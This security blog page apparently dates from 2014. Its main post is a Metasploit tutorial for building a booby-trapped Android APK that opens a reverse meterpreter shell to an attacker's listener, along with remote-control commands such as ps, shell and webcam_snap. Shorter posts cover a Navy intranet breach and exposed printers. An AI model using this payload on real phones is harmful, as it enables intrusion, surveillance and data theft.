Getting a Remote Shell on an Android Device using Metasploit

Wednesday, February 19, 2014

Dan Dieterle

B64e021126c832bb29ec9fa988155eaf

Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.

We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.

Creating a booby trapped APK file

First up, we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk

Android App

The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it. You will need to put your Kali Linux IP address in for the LHOST address. You can change the port address also if you would like.

Once this is run, a file called “app.apk” will be created:

List File

2. Now just send this file to your Android device, I used a Smart Phone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:

  • user exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost 192.168.1.16 (enter your Kali IP address)
  • set lport 4444

Then just type exploit to start the handler:

exploit1

6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit system you should see this:

Reverse TCP session

An active session is created and it drops you automatically into a meterpreter prompt.

8. From here your can type “sysinfo” to get information on the device:

sysinfo

9. You can see the processes running by typing, “ps”:

PS command

You can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the command that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:

meterpreter > shell
Process 1 created.
Channel 1 created.
ls

The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.

What’s next with Android support on Meterpreter?

Well, it is not “officially” supported yet, but there is an extension available to Meterpreter that allows several new Android based commands:

Pretty amazing stuff!

 

  Iran inside US Navy Unclassified Intranet System for Four Months  •February 18, 2014 • Leave a Comment

Navy NMCI

It took the Navy longer than previously reported to remove Iranian hackers from the Navy and Marine Corps Intranet (NMCI). According to the Wall Street Journal, the hackers had access to the system last year for four months.

The hackers were able to gain access via a hole in a public facing website and conducted surveillance on the intranet, though a senior official told the WSJ that no emails were hacked and no data was extracted.

The NMCI is the largest enterprise network in the world and second only to the internet itself in size. It handles about 70% of the Department of the Navy’s IT needs. It encompasses more than 360,000 computers and 4,100 servers connected together in over 600 locations.

The sheer size of this network makes is very difficult to secure. IT specialists have to make sure everything is kept updated and all security issues are dealt with on the hundreds of thousands of systems.

Attackers just need to find one opening to exploit.

Then once someone does gain access into a network of this size, it can take a long time for security specialists to analyze what was touched, what was compromised and what, if any, backdoors were left.

Though the system is the Navy’s unclassified network, the fact that Iran was able to gain access to this military intranet is very concerning.

It was a real big deal, it was a significant penetration that showed a weakness in the system.” a senior official told the WSJ.

Of interest to this story too, is that just five days after the breach was initially disclosed last year, an Iranian cyber commander was apparently assassinated.

Iranian Cyber Commander Mojtaba Ahmadi’s body was found in a remote area near Karaj. Initial police reports stated that he has shot by two men on a motorbike.

An eyewitness reported that there were “two bullet wounds on his body”, and that ‘”The extent of his injuries indicated that he had been assassinated from a close range with a pistol“.

This style of attack seems to be a very similar to a tactic used by Israeli secret agents.

Though it has not been proved that Israel was involved, and Iranian officials later denied that Ahmadi was assassinated – One thing seems true, physical responses for cyber attacks seem to be on the table.

And, you don’t mess with the United States Marine Corps!

  Web Enabled Printer (In)Security  •February 17, 2014 • 1 Comment

Printer Insecurities

In the name of simplicity, it seems like every device is “Web Enabled” now. But the question is, where is the security? I was always stunned on how many Printers you can find completely open on the web through Shodan. I never understood why, until now.

I was setting up a brand new “web enabled” printer. It went great, the quick start guide walked me through installing the ink cartridges, had a great video on connecting the paper trays to the printer and how to correctly insert paper.

It even walked me through turning on networking and getting it connected to my Wireless network.

In no time I was up and running!

It wanted to turn on printing from the internet, it got an e-mail address from the web all by itself and then wanted to turn on additional apps. It was so helpful!

But then I wondered, how is this thing secured?!?

So, I surf to the IP address that the printer was assigned and it had a beautiful web control interface for the printer. That was completely unsecured…

I dug through the menus and finally found the option to turn Web Based security to “On” and put in an administrator password. It informed me that it would not block internet users from seeing everything, but would limit them informational pages only.

Then I realized, it never prompted me to turn control panel security on, and never asked me for a password. So I dug through the included manual (instead of just browsing the quick start guide) thinking I missed something.

Everything was in the manual, including troubleshooting network connectivity. But nowhere did it mention turning security on or how to even do it!

It’s just a printer you say – But printers can leak some very important information, like internal network settings, logs, files and in some cases, even user accounts.

And a few quick keyword searched on Shodan turns up Tens of thousands of insecure printers.

Yikes!

Last month the author of “Shodan Blog” wrote a great article on printers bleeding information publicly.

Titled, “I know You Need Toner“, it lists the printers worldwide that currently are in need of toner:

Need Toner

It also shows the number of printers that need toner by country, and a list of the top organizations that need to change their toner.

Cute, I know, but it should really be a warning to people about what information is being bled publicly through the horde of web enabled devices that we are putting throughout our organizations.

It took several years, but most router manufacturers now ship new routers with some level of security turned on. It looks like other web enabled devices (like printers) need to start doing this too!

  CyberArms is Back! Security News, Book Reviews and More  •February 17, 2014 • 2 Comments

I’ve been out of town for almost two months sans internet and had a long time to think about this blog, among other things. So I figured it was well and about time to kick some new life into it and get it spun up again.

Yes!

I haven’t posted on CyberArms consistently for a long time, yet I still amazed at the constant flood of visitors that still check in every day. So, I have decided to begin posting regularly again. Yup, security news, computer tips and even some cool military stuff!

New Ethical Hacking Book!

Though I haven’t been posting, I have been fairly busy on other projects. The biggest one is the release of my new book, “Basic Security Testing with Kali Linux“:

Basic Security Testing with Kali Linux

Over 300 pages packed full with hands-on step by step Ethical Hacking tutorials. An E-Book version will be out later this week!

Navy Base Visit

During my two month “vacation”, I was able to visit one of our top Navy bases. I met some great people, got to see numerous Naval Warships and even got a tour of a Super Carrier!

I also watched the movie “Lone Survivor” on the base. It was a powerful movie, and watching it surrounded by our men and women in the Navy was an experience that I will never forget.

Vice Adm. Rogers Cyber Command Nomination

I was delighted to hear that Vice Admiral Michael Rogers was nominated to be the future leader of both Cyber Command and the NSA. I have had the honor of meeting Vice Adm. Rogers and his wife at a Navy function (non-cybersecurity related) a few years ago.

He was down to Earth, professional, competent and truly seems to be a man of integrity.

I cannot think of a man more qualified to man the helm of our nations Cyber War and Signals Intelligence forces.

Books

I was able to catch up on some reading during my vacation too. Here are two of my favorites:

Information Warfare” is an older book by Winn Schwartau, the Second Edition was published in 1996! I was reading a computer book about 20 years old, yet the content and information still seems very pertinent today.

Bravo Two Zero” is a first hand account of a British SAS unit in Iraq during the First Gulf War that evolved into one of the longest Escape and Evasion treks in history. If you liked the movie Lone Survivor, you will love this book.

This blog was cross posted from the Cyber Arms Computer Security blog.

5544
Privacy Vulnerabilities Webappsec->General
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.